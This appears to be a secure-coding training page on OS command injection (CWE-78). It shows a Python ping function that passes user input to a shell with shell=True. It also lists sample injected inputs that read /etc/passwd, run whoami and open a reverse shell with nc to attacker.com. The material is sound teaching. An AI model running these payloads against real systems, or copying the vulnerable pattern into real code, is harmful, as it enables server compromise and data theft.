/Code Review/OS Command Injection

OS Command Injection

User input is passed directly to system commands without sanitization.

CRITICALMedium

Vulnerable Codepython

1import subprocess
2
3def ping_host(host):
4    cmd = f"ping -c 4 {host}"
5    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
6    return result.stdout

Understanding the Issue

The user input is directly interpolated into a shell command. Using shell=True allows command chaining with ; | && etc. An attacker can inject additional commands to read files, spawn shells, or compromise the server.

Command Chaining

Attacker uses shell metacharacters to execute arbitrary commands

Malicious Input

Host: 8.8.8.8; cat /etc/passwd
Host: 8.8.8.8 && whoami
Host: 8.8.8.8 | nc attacker.com 4444 -e /bin/sh

Impact

Command becomes:
ping -c 4 8.8.8.8; cat /etc/passwd

✓ First command pings 8.8.8.8
✓ Second command reads /etc/passwd
✓ Attacker can read any file or run any command

Technical Details

Vulnerability Type: OS Command Injection
Severity: CRITICAL
Language: Python
CWE: CWE-78
OWASP: A03:2021 - Injection

OS Command Injection

Understanding the Issue

How Attackers Exploit This

Command Chaining

Finding the Vulnerability(3 hints)

Technical Details

OS Command Injection

Understanding the Issue

How Attackers Exploit This

Command Chaining

Finding the Vulnerability(3 hints)

Technical Details